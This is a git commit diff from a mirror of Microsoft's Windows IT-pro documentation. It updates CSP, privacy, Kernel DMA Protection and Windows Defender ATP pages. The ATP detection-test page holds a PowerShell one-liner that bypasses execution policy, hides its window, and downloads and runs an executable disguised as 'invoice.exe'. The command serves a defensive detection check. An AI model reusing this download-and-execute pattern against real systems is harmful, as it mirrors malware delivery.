deepblue/windows-itpro-docs
1
0
Fork 0
mirror of https://github.com/MicrosoftDocs/windows-itpro-docs.git synced 2025-06-15 18:33:43 +00:00
Code Issues Actions 3 Packages Projects Releases Wiki Activity

Merge branch 'master' of https://cpubwin.visualstudio.com/_git/it-client into DHazure

Browse Source
This commit is contained in:
jaimeo
2018-09-10 15:15:25 -07:00
parent 7c0b6460e0 4d6a88c7bd
commit 59ca49c5ae
16 changed files with 156 additions and 65 deletions
Download Patch File Download Diff File Expand all files Collapse all files

16
windows/client-management/mdm/windowsdefenderapplicationguard-csp.md
View File

@ -6,7 +6,7 @@ ms.topic: article
ms.prod: w10
ms.technology: windows
author: MariciaAlforque
ms.date: 08/02/2018
ms.date: 09/10/2018
---
# WindowsDefenderApplicationGuard CSP
@ -14,7 +14,7 @@ ms.date: 08/02/2018
> [!WARNING]
> Some information relates to prereleased product which may be substantially modified before it's commercially released. Microsoft makes no warranties, express or implied, with respect to the information provided here.
The WindowsDefenderApplicationGuard configuration service provider (CSP) is used by the enterprise to configure the settings in the Application Guard. This CSP was added in Windows 10, version 1709.
The WindowsDefenderApplicationGuard configuration service provider (CSP) is used by the enterprise to configure the settings in Windows Defender Application Guard. This CSP was added in Windows 10, version 1709.
The following diagram shows the WindowsDefenderApplicationGuard configuration service provider in tree format.
@ -132,12 +132,12 @@ If you disable or don't configure this policy, applications inside Windows Defen
<a href="" id="status"></a>**Status**
Returns bitmask that indicates status of Application Guard installation and pre-requisites on the device. Value type is integer. Supported operation is Get.
Bit 0 - Set to 1 when WDAG is enabled into enterprise manage mode
Bit 1 - Set to 1 when the client machine is Hyper-V capable
Bit 2 - Set to 1 when the client machine has a valid OS license and SKU
Bit 3 - Set to 1 when WDAG installed on the client machine
Bit 4 - Set to 1 when required Network Isolation Policies are configured
Bit 5 - Set to 1 when the client machine meets minimum hardware requirements
- Bit 0 - Set to 1 when WDAG is enabled into enterprise manage mode
- Bit 1 - Set to 1 when the client machine is Hyper-V capable
- Bit 2 - Set to 1 when the client machine has a valid OS license and SKU
- Bit 3 - Set to 1 when WDAG installed on the client machine
- Bit 4 - Set to 1 when required Network Isolation Policies are configured
- Bit 5 - Set to 1 when the client machine meets minimum hardware requirements
<a href="" id="installwindowsdefenderapplicationguard"></a>**InstallWindowsDefenderApplicationGuard**
Initiates remote installation of Application Guard feature. Supported operations are Get and Execute.

4
windows/client-management/mdm/windowsdefenderapplicationguard-ddf-file.md
View File

@ -6,7 +6,7 @@ ms.topic: article
ms.prod: w10
ms.technology: windows
author: MariciaAlforque
ms.date: 08/02/2018
ms.date: 09/10/2018
---
# WindowsDefenderApplicationGuard DDF file
@ -20,7 +20,7 @@ Looking for the DDF XML files? See [CSP DDF files download](configuration-servic
This XML is for Windows 10, next major version.
``` syntax
```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE MgmtTree PUBLIC " -//OMA//DTD-DM-DDF 1.2//EN"
"http://www.openmobilealliance.org/tech/DTD/DM_DDF-V1_2.dtd"

6
windows/configuration/cortana-at-work/cortana-at-work-voice-commands.md
View File

@ -30,9 +30,9 @@ To enable voice commands in Cortana
Cortana can perform actions on apps in the foreground (taking focus from Cortana) or in the background (allowing Cortana to keep focus). We recommend that you decide where an action should happen, based on what your voice command is intended to do. For example, if your voice command requires employee input, its best for that to happen in the foreground. However, if the app only uses basic commands and doesnt require interaction, it can happen in the background.
- **Start Cortana with focus on your app, using specific voice-enabled statements.** [Activate a foreground app with voice commands through Cortana](https://docs.microsoft.com/cortana/voicecommands/launch-a-foreground-app-with-voice-commands-in-cortana).
- **Start Cortana with focus on your app, using specific voice-enabled statements.** [Activate a foreground app with voice commands through Cortana](https://docs.microsoft.com/en-us/cortana/voice-commands/launch-a-foreground-app-with-voice-commands-in-cortana).
- **Start Cortana removing focus from your app, using specific voice-enabled statements.** [Activate a background app in Cortana using voice commands](https://docs.microsoft.com/cortana/voicecommands/launch-a-background-app-with-voice-commands-in-cortana).
- **Start Cortana removing focus from your app, using specific voice-enabled statements.** [Activate a background app in Cortana using voice commands](https://docs.microsoft.com/en-us/cortana/voice-commands/launch-a-background-app-with-voice-commands-in-cortana).
2. **Install the VCD file on employees' devices**. You can use System Center Configuration Manager or Microsoft Intune to deploy and install the VCD file on your employees' devices, the same way you deploy and install any other package in your organization.
@ -61,4 +61,4 @@ While these aren't line-of-business apps, we've worked to make sure to implement
Cortana changes, letting you provide your trip details for Uber.
## See also
- [Cortana for developers](https://go.microsoft.com/fwlink/?LinkId=717385)
- [Cortana for developers](https://go.microsoft.com/fwlink/?LinkId=717385)

4
windows/deployment/update/windows-update-sources.md
View File

@ -15,8 +15,8 @@ ms.date: 04/05/2018
Windows 10 devices can receive updates from a variety of sources, including Windows Update online, a Windows Server Update Services server, and others. To determine the source of Windows Updates currently being used on a device, follow these steps: 
1. Start Windows PowerShell as an administrator
2. Run `\$MUSM = New-Object -ComObject “Microsoft.Update.ServiceManager”`.
3. Run `\$MUSM.Services`. Check the resulting output for the **Name** and **OffersWindowsUPdates** parameters, which you can intepret according to this table:
2. Run `$MUSM = New-Object -ComObject “Microsoft.Update.ServiceManager”`.
3. Run `$MUSM.Services`. Check the resulting output for the **Name** and **OffersWindowsUPdates** parameters, which you can intepret according to this table:
| Output | Interpretation |
|-----------------------------------------------------|-----------------------------------|

45
windows/privacy/diagnostic-data-viewer-overview.md
View File

@ -31,9 +31,7 @@ Before you can use this tool, you must turn on data viewing in the **Settings**
**To turn on data viewing**
1. Go to **Start**, select **Settings** > **Privacy** > **Diagnostics & feedback**.
2. Under **Diagnostic data**, turn on the **If data viewing is enabled, you can see your diagnostics data** option.
![Location to turn on data viewing](images/ddv-data-viewing.png)
2. Under **Diagnostic data**, turn on the **If data viewing is enabled, you can see your diagnostics data** option.<p>![Location to turn on data viewing](images/ddv-data-viewing.png)
### Download the Diagnostic Data Viewer
Download the app from the [Microsoft Store Diagnostic Data Viewer](https://www.microsoft.com/en-us/store/p/diagnostic-data-viewer/9n8wtrrsq8f7?rtc=1) page.
@ -44,11 +42,7 @@ You must start this app from the **Settings** panel.
**To start the Diagnostic Data Viewer**
1. Go to **Start**, select **Settings** > **Privacy** > **Diagnostics & feedback**.
2. Under **Diagnostic data**, select the **Diagnostic Data Viewer** button.
![Location to turn on the Diagnostic Data Viewer](images/ddv-settings-launch.png)<br><br>-OR-<br><br>
Go to **Start** and search for _Diagnostic Data Viewer_.
2. Under **Diagnostic data**, select the **Diagnostic Data Viewer** button.<p>![Location to turn on the Diagnostic Data Viewer](images/ddv-settings-launch.png)<p>-OR-<p> Go to **Start** and search for _Diagnostic Data Viewer_.
3. Close the Diagnostic Data Viewer app, use your device as you normally would for a few days, and then open Diagnostic Data Viewer again to review the updated list of diagnostic data.
@ -58,28 +52,18 @@ You must start this app from the **Settings** panel.
### Use the Diagnostic Data Viewer
The Diagnostic Data Viewer provides you with the following features to view and filter your device's diagnostic data.
- **View your diagnostic events.** In the left column, you can review your diagnostic events. These events reflect activities that occurred and were sent to Microsoft.
- **View your diagnostic events.** In the left column, you can review your diagnostic events. These events reflect activities that occurred and were sent to Microsoft.<p> Selecting an event opens the detailed JSON view, which provides the exact details uploaded to Microsoft. Microsoft uses this info to continually improve the Windows operating system.
Selecting an event opens the detailed JSON view, which provides the exact details uploaded to Microsoft. Microsoft uses this info to continually improve the Windows operating system.
- **Search your diagnostic events.** The **Search** box at the top of the screen lets you search amongst all of the diagnostic event details. The returned search results include any diagnostic event that contains the matching text.<p>Selecting an event opens the detailed JSON view, with the matching text highlighted.
- **Search your diagnostic events.** The **Search** box at the top of the screen lets you search amongst all of the diagnostic event details. The returned search results include any diagnostic event that contains the matching text.
- **Filter your diagnostic event categories.** The apps Menu button opens the detailed menu. In here, you'll find a list of diagnostic event categories, which define how the events are used by Microsoft.<p>Selecting a check box lets you filter between the diagnostic event categories.
Selecting an event opens the detailed JSON view, with the matching text highlighted.
- **Help to make your Windows experience better.** Microsoft samples diagnostic data from a small amount of devices to make big improvements to the Windows operating system and ultimately, your experience. If youre a part of this small device group and you experience issues, Microsoft will collect the associated event diagnostic data, allowing your info to potentially help fix the issue for others.<p>To signify your contribution, youll see this icon (![Icon to review the device-level sampling](images/ddv-device-sample.png)) if your device is part of the sampling group. In addition, if any of your diagnostic data events are sent from your device to Microsoft to help make improvements, youll see this icon (![Icon to review the event-level sampling](images/ddv-event-sample.png)).
- **Filter your diagnostic event categories.** The apps Menu button opens the detailed menu. In here, you'll find a list of diagnostic event categories, which define how the events are used by Microsoft.
Selecting a check box lets you filter between the diagnostic event categories.
- **Help to make your Windows experience better.** Microsoft samples diagnostic data from a small amount of devices to make big improvements to the Windows operating system and ultimately, your experience. If youre a part of this small device group and you experience issues, Microsoft will collect the associated event diagnostic data, allowing your info to potentially help fix the issue for others.
To signify your contribution, youll see this icon (![Icon to review the device-level sampling](images/ddv-device-sample.png)) if your device is part of the sampling group. In addition, if any of your diagnostic data events are sent from your device to Microsoft to help make improvements, youll see this icon (![Icon to review the event-level sampling](images/ddv-event-sample.png)).
- **Provide diagnostic event feedback.** The **Feedback** icon opens the Feedback Hub app, letting you provide feedback about the Diagnostic Data Viewer and the diagnostic events.
Selecting a specific event in the Diagnostic Data Viewer automatically fills in the field in the Feedback Hub. You can add your comments to the box labeled, **Give us more detail (optional)**.
- **Provide diagnostic event feedback.** The **Feedback** icon opens the Feedback Hub app, letting you provide feedback about the Diagnostic Data Viewer and the diagnostic events.<p>Selecting a specific event in the Diagnostic Data Viewer automatically fills in the field in the Feedback Hub. You can add your comments to the box labeled, **Give us more detail (optional)**.
>[!Important]
>All content in the Feedback Hub is publicly viewable. Therefore, make sure you don't put any personal info into your feedback comments.
>[!Important]
>All content in the Feedback Hub is publicly viewable. Therefore, make sure you don't put any personal info into your feedback comments.
## Turn off data viewing
When you're done reviewing your diagnostic data, you should turn of data viewing.
@ -87,17 +71,10 @@ When you're done reviewing your diagnostic data, you should turn of data viewing
**To turn off data viewing**
1. Go to **Start**, select **Settings** > **Privacy** > **Diagnostics & feedback**.
2. Under **Diagnostic data**, turn off the **If data viewing is enabled, you can see your diagnostics data** option.
![Location to turn off data viewing](images/ddv-settings-off.png)
2. Under **Diagnostic data**, turn off the **If data viewing is enabled, you can see your diagnostics data** option.<p>![Location to turn off data viewing](images/ddv-settings-off.png)
## View additional diagnostic data in the View problem reports tool
You can review additional Windows Error Reporting diagnostic data in the **View problem reports** tool. This tool provides you with a summary of various crash reports that are sent to Microsoft as part of Windows Error Reporting. We use this data to find and fix specific issues that are hard to replicate and to improve the Windows operating system.
**To view your Windows Error Reporting diagnostic data**
1. Go to **Start**, select **Control Panel** > **All Control Panel Items** > **Security and Maintenance** > **Problem Reports**.<br><br>-OR-<br><br>
Go to **Start** and search for _Problem Reports_.
The **Review problem reports** tool opens, showing you your Windows Error Reporting reports, along with a status about whether it was sent to Microsoft.
![View problem reports tool with report statuses](images/ddv-problem-reports-screen.png)
1. Go to **Start**, select **Control Panel** > **All Control Panel Items** > **Security and Maintenance** > **Problem Reports**.<p>-OR-<p>Go to **Start** and search for _Problem Reports_.<p>The **Review problem reports** tool opens, showing you your Windows Error Reporting reports, along with a status about whether it was sent to Microsoft.<p>![View problem reports tool with report statuses](images/ddv-problem-reports-screen.png)

2
windows/security/information-protection/TOC.md
View File

@ -27,6 +27,8 @@
## [Encrypted Hard Drive](encrypted-hard-drive.md)
## [Kernel DMA Protection for Thunderbolt™ 3](kernel-dma-protection-for-thunderbolt.md)
## [Protect your enterprise data using Windows Information Protection (WIP)](windows-information-protection\protect-enterprise-data-using-wip.md)
### [Create a Windows Information Protection (WIP) policy using Microsoft Intune](windows-information-protection\overview-create-wip-policy.md)
#### [Create a Windows Information Protection (WIP) policy using the classic console for Microsoft Intune](windows-information-protection\create-wip-policy-using-intune.md)

BIN
windows/security/information-protection/images/device-details-tab.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 41 KiB

BIN
windows/security/information-protection/images/kernel-dma-protection-user-experience.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 21 KiB

109
windows/security/information-protection/kernel-dma-protection-for-thunderbolt.md Normal file
View File

@ -0,0 +1,109 @@
---
title: Kernel DMA Protection for Thunderbolt™ 3 (Windows 10)
description: Kernel DMA Protection protects PCs against drive-by Direct Memory Access (DMA) attacks using PCI hot plug devices connected to Thunderbolt™ 3 ports.
ms.prod: w10
ms.mktglfcycl: deploy
ms.sitesec: library
ms.pagetype: security
author: aadake
ms.date: 09/06/2018
---
# Kernel DMA Protection for Thunderbolt™ 3
**Applies to**
- Windows 10
In Windows 10 version 1803, Microsoft introduced a new feature called Kernel DMA Protection to protect PCs against drive-by Direct Memory Access (DMA) attacks using PCI hot plug devices connected to Thunderbolt™ 3 ports.
Drive-by DMA attacks can lead to disclosure of sensitive information residing on a PC, or even injection of malware that allows attackers to bypass the lock screen or control PCs remotely.
This feature does not protect against DMA attacks via 1394/FireWire, PCMCIA, CardBus, ExpressCard, and so on.
## Background
PCI devices are DMA-capable, which allows them to read and write to system memory at will, without having to engage the system processor in these operations.
The DMA capability is what makes PCI devices the highest performing devices available today.
These devices have historically existed only inside the PC chassis, either connected as a card or soldered on the motherboard.
Access to these devices required the user to turn off power to the system and disassemble the chassis.
Today, this is no longer the case with Thunderbolt™.
Thunderbolt™ technology has provided modern PCs with extensibility that was not available before for PCs.
It allows users to attach new classes of external peripherals, such as graphics cards or other PCI devices, to their PCs with a hot plug experience identical to USB.
Having PCI hot plug ports externally and easily accessible makes PCs susceptible to drive-by DMA attacks.
Drive-by DMA attacks are attacks that occur while the owner of the system is not present and usually take less than 10 minutes, with simple to moderate attacking tools (affordable, off-the-shelf hardware and software) that do not require the disassembly of the PC.
A simple example would be a PC owner leaves the PC for a quick coffee break, and within the break, and attacker steps in, plugs in a USB-like device and walks away with all the secrets on the machine, or injects a malware that allows them to have full control over the PC remotely.
## How Windows protects against DMA drive-by attacks
Windows leverages the system Input/Output Memory Management Unit (IOMMU) to block external devices from starting and performing DMA unless the drivers for these devices support memory isolation (such as DMA-remapping).
Devices with compatible drivers will be automatically enumerated, started and allowed to perform DMA to their assigned memory regions.
Devices with incompatible drivers will be blocked from starting and performing DMA until an authorized user signs into the system or unlocks the screen.
## User experience
![Kernel DMA protection user experience](images/kernel-dma-protection-user-experience.png)
A device that is incompatible with DMA-remapping will be blocked from starting if the device was plugged in before an authorized user logs in, or while the screen is locked.
Once the system is unlocked, the device driver will be started by the OS, and the device will continue to function normally until the system is rebooted, or the device is unplugged.
The devices will continue to function normally if the user locks the screen or logs out of the system.
## System compatibility
Kernel DMA Protection requires new UEFI firmware support.
This support is anticipated only on newly-introduced, Intel-based systems shipping with Windows 10 version 1803 (not all systems). Virtualization-based Security (VBS) is not required.
To see if a system supports Kernel DMA Protection, check the System Information desktop app (MSINFO32).
Systems released prior to Windows 10 version 1803 do not support Kernel DMA Protection, but they can leverage other DMA attack mitigations as described in [BitLocker countermeasures](bitlocker/bitlocker-countermeasures.md).
>[!NOTE]
>Kernel DMA Protection is not compatible with other BitLocker DMA attacks countermeasures. It is recommended to disable the BitLocker DMA attacks countermeasures if the system supports Kernel DMA Protection. Kernel DMA Protection provides higher security bar for the system over the BitLocker DMA attack countermeasures, while maintaining usability of external peripherals.
## Enabling Kernel DMA protection
Systems running Windows 10 version 1803 that do support Kernel DMA Protection do have this security feature enabled automatically by the OS with no user or IT admin configuration required.
**To check if a device supports kernel DMA protection**
1. Launch MSINFO32.exe in a command prompt, or in the Windows search bar.
2. Check the value of **Kernel DMA Protection**.
![Kernel DMA protection](bitlocker/images/kernel-dma-protection.png)
3. If the current state of **Kernel DMA Protection** is OFF and **Virtualization Technology in Firmware** is NO:
- Reboot into BIOS settings
- Turn on Intel Virtualization Technology.
- Turn on Intel Virtualization Technology for I/O (VT-d). In Windows 10 version 1803, only Intel VT-d is supported. Other platforms can use DMA attack mitigations described in BitLocker Countermeasures.
- Reboot system into Windows 10.
4. If the state of **Kernel DMA Protection** remains Off, then the system does not support this feature.
## Frequently asked questions
### Do in-market systems support Kernel DMA protection for Thunderbolt™ 3?
In market systems, released with Windows 10 version 1709 or earlier, will not support Kernel DMA protection for Thunderbolt™ 3 after upgrading to Windows 10 version 1803, as this feature requires the BIOS/platform firmware changes and guarantees.
### Does Kernel DMA Protection prevent drive-by DMA attacks during Boot?
No, Kernel DMA Protection only protects against drive-by DMA attacks after the OS is loaded. It is the responsibility of the system firmware/BIOS to protect against attacks via the Thunderbolt™ 3 ports during boot.
### How can I check if a certain driver supports DMA-remapping?
DMA-remapping is supported for specific device drivers, and is not universally supported by all devices and drivers on a platform. To check if a specific driver is opted into DMA-remapping, check the values corresponding to the following Property GUID (highlighted in red in the image below) in the Details tab of a device in Device Manager. A value of 0 or 1 means that the device driver does not support DMA-remapping. A value of 2 means that the device driver supports DMA-remapping.
Please check the driver instance for the device you are testing. Some drivers may have varying values depending on the location of the device (internal vs. external).
![Kernel DMA protection user experience](images/device-details-tab.png)
### What should I do if the drivers for my Thunderbolt™ 3 peripherals do not support DMA-remapping?
If the peripherals do have class drivers provided by Windows 10, please use these drivers on your systems. If there are no class drivers provided by Windows for your peripherals, please contact your peripheral vendor/driver vendor to update the driver to support this functionality. Details for driver compatibility requirements can be found here (add link to OEM documentation).
### Do Microsoft drivers support DMA-remapping?
In Windows 10 1803 and beyond, the Microsoft inbox drivers for USB XHCI (3.x) Controllers, Storage AHCI/SATA Controllers and Storage NVMe Controllers support DMA-remapping.
### Do drivers for non-PCI devices need to be compatible with DMA-remapping?
No. Devices for non-PCI peripherals, such as USB devices, do not perform DMA, thus no need for the driver to be compatible with DMA-remapping.
### How can an enterprise enable the “External device enumeration” policy?
The “External device enumeration” policy controls whether to enumerate external devices that are not compatible with DMA-remapping. Devices that are compatible with DMA-remapping are always enumerated. The policy can be enabled via Group Policy or Mobile Device Management (MDM):
- Group Policy: Administrative Templates\System\Kernel DMA Protection\Enumeration policy for external devices incompatible with Kernel DMA Protection
- MDM: [DmaGuard policies](https://docs.microsoft.com/windows/client-management/mdm/policy-csp-dmaguard#dmaguard-policies)
## Related topics
- [BitLocker countermeasures](bitlocker/bitlocker-countermeasures.md)
- [DmaGuard MDM policies](https://docs.microsoft.com/windows/client-management/mdm/policy-csp-dmaguard#dmaguard-policies)

9
windows/security/threat-protection/index.md
View File

@ -1,18 +1,21 @@
---
title: Threat Protection (Windows 10)
description: Learn how Windows Defender ATP helps protect against threats.
keywords: threat protection, windows defender advanced threat protection, attack surface reduction, next generation protection, endpoint detection and response, automated investigation and response, secure score, advanced hunting
search.product: eADQiWindows 10XVcnh
ms.prod: w10
ms.mktglfcycl: deploy
ms.sitesec: library
ms.pagetype: security
ms.localizationpriority: high
author: dansimp
ms.date: 09/03/2018
ms.localizationpriority: medium
ms.date: 09/07/2018
---
# Threat Protection
Windows Defender Advanced Threat Protection (ATP) is a unified platform for preventative protection, post-breach detection, automated investigation, and response. Windows Defender ATP protects endpoints from cyber threats; detects advanced attacks and data breaches, automates security incidents and improves security posture.
Windows Defender Advanced Threat Protection (Windows Defender ATP) is a unified platform for preventative protection, post-breach detection, automated investigation, and response. Windows Defender ATP protects endpoints from cyber threats; detects advanced attacks and data breaches, automates security incidents and improves security posture.
<center><h2>Windows Defender ATP</center></h2>
<table>
<tr>
<td><a href="#asr"><center><img src="images/ASR_icon.png"> <br><b>Attack surface reduction</b></center></a></td>

2
windows/security/threat-protection/windows-defender-atp/advanced-hunting-windows-defender-advanced-threat-protection.md
View File

@ -144,7 +144,7 @@ Check out the [Advanced Hunting repository](https://github.com/Microsoft/Windows
## Related topic
- [Advanced hunting reference](advanced-hunting-reference-windows-defender-advanced-threat-protection.md)
- [Advanced hunting query language best practices](/advanced-hunting-best-practices-windows-defender-advanced-threat-protection.md)
- [Advanced hunting query language best practices](advanced-hunting-best-practices-windows-defender-advanced-threat-protection.md)

3
windows/security/threat-protection/windows-defender-atp/data-storage-privacy-windows-defender-advanced-threat-protection.md
View File

@ -10,13 +10,12 @@ ms.pagetype: security
ms.author: macapara
author: mjcaparas
ms.localizationpriority: medium
ms.date: 07/05/2018
ms.date: 09/07/2018
---
# Windows Defender ATP data storage and privacy
**Applies to:**
- Windows Defender Advanced Threat Protection (Windows Defender ATP)

4
windows/security/threat-protection/windows-defender-atp/get-started.md
View File

@ -24,8 +24,8 @@ The attack surface reduction set of capabilities provide the first line of defen
**Next generation protection**<br>
To further reinforce the security perimeter of your network, Windows Defender ATP uses next generation protection designed to catch all types of emerging threats.
**Endpoint protection and response**<br>
Endpoint protection and response capabilities are put in place to detect, investigate, and respond to advanced threats that may have made it past the first two security pillars.
**Endpoint detection and response**<br>
Endpoint detection and response capabilities are put in place to detect, investigate, and respond to advanced threats that may have made it past the first two security pillars.
**Auto investigation and remediation**<br>
In conjunction with being able to quickly respond to advanced attacks, Windows Defender ATP offers automatic investigation and remediation capabilities that help reduce the volume of alerts in minutes at scale.

7
windows/security/threat-protection/windows-defender-atp/run-detection-test-windows-defender-advanced-threat-protection.md
View File

@ -10,7 +10,7 @@ ms.pagetype: security
ms.author: macapara
author: mjcaparas
ms.localizationpriority: medium
ms.date: 11/06/2017
ms.date: 09/07/2018
---
# Run a detection test on a newly onboarded Windows Defender ATP machine
@ -26,7 +26,8 @@ ms.date: 11/06/2017
Run the following PowerShell script on a newly onboarded machine to verify that it is properly reporting to the Windows Defender ATP service.
1. Open an elevated command-line prompt on the machine and run the script:
1. Create a folder: 'C:\test-WDATP-test'.
2. Open an elevated command-line prompt on the machine and run the script:
a. Go to **Start** and type **cmd**.
@ -34,7 +35,7 @@ Run the following PowerShell script on a newly onboarded machine to verify that
![Window Start menu pointing to Run as administrator](images/run-as-admin.png)
2. At the prompt, copy and run the following command:
3. At the prompt, copy and run the following command:
```
powershell.exe -NoExit -ExecutionPolicy Bypass -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile('http://127.0.0.1/1.exe', 'C:\test-WDATP-test\invoice.exe');Start-Process 'C:\test-WDATP-test\invoice.exe'

4
windows/security/threat-protection/windows-defender-atp/troubleshoot-onboarding-windows-defender-advanced-threat-protection.md
View File

@ -10,7 +10,7 @@ ms.pagetype: security
ms.author: macapara
author: mjcaparas
ms.localizationpriority: medium
ms.date: 04/24/2018
ms.date: 09/07/2018
---
# Troubleshoot Windows Defender Advanced Threat Protection onboarding issues
@ -75,7 +75,7 @@ Event ID | Error Type | Resolution steps
## Troubleshoot onboarding issues using Microsoft Intune
You can use Microsoft Intune to check error codes and attempt to troubleshoot the cause of the issue.
If you have configured policies in Intune and they are not propagated on machines, you might need to configure automatic MDM enrollment. For more information, see the [Configure automatic MDM enrollment](https://go.microsoft.com/fwlink/?linkid=829597) section.
If you have configured policies in Intune and they are not propagated on machines, you might need to configure automatic MDM enrollment.
Use the following tables to understand the possible causes of issues while onboarding:

6
windows/security/threat-protection/windows-defender-security-center/wdsc-firewall-network-protection.md
View File

@ -22,7 +22,7 @@ ms.date: 04/30/2018
- Windows 10, version 1703 and later
The **Firewall & network protection** section contains information about the firewalls and network connections used by the machine, including the status of Windows Defender Firewall and any other third-party firewalls. IT administrators and IT pros can get configuration guidance from the [Windows Defender Firewall with Advanced Security documentation library](https://docs.microsoft.com/en-us/windows/access-protection/windows-firewall/windows-firewall-with-advanced-security).
The **Firewall & network protection** section contains information about the firewalls and network connections used by the machine, including the status of Windows Defender Firewall and any other third-party firewalls. IT administrators and IT pros can get configuration guidance from the [Windows Defender Firewall with Advanced Security documentation library](../windows-firewall/windows-firewall-with-advanced-security.md).
In Windows 10, version 1709 and later, the section can be hidden from users of the machine. This can be useful if you don't want employees in your organization to see or have access to user-configured options for the features shown in the section.
@ -38,7 +38,7 @@ This can only be done in Group Policy.
>
>You must have Windows 10, version 1709 or later. The ADMX/ADML template files for earlier versions of Windows do not include these Group Policy settings.
1. On your Group Policy management machine, open the [Group Policy Management Console](https://technet.microsoft.com/library/cc731212.aspx), right-click the Group Policy Object you want to configure and click **Edit**.
1. On your Group Policy management machine, open the Group Policy Management Console, right-click the Group Policy Object you want to configure and click **Edit**.
3. In the **Group Policy Management Editor** go to **Computer configuration** and click **Administrative templates**.
@ -46,7 +46,7 @@ This can only be done in Group Policy.
6. Open the **Hide the Firewall and network protection area** setting and set it to **Enabled**. Click **OK**.
7. [Deploy the updated GPO as you normally do](https://msdn.microsoft.com/en-us/library/ee663280(v=vs.85).aspx).
7. Deploy the updated GPO as you normally do.
>[!NOTE]
>If you hide all sections then the app will show a restricted interface, as in the following screenshot: